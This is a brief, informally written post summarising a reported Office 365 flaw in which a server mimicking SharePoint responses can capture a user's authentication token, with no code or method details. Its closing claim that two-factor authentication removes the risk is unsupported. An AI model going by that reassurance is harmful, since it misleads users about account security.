the new possible phishing middle in the man attack against sharepoint servers
A flaw in Microsoft Office 365 can expose account credentials by way of a Word document hosted on a webserver and is “totally invisible to existing perimeter and endpoint protection defenses,” according to researcher Noam Liran.
When a user is downloading a document from a SharePoint server, they are required to be logged in to their account. The server verifies the login credentials and issues an authentication token.
Liran discovered he could use his own server mimic the responses anticipated from a sharepoint.com domain server and elicit the generation of the token and intercept it.
if you have double authentification there is no problem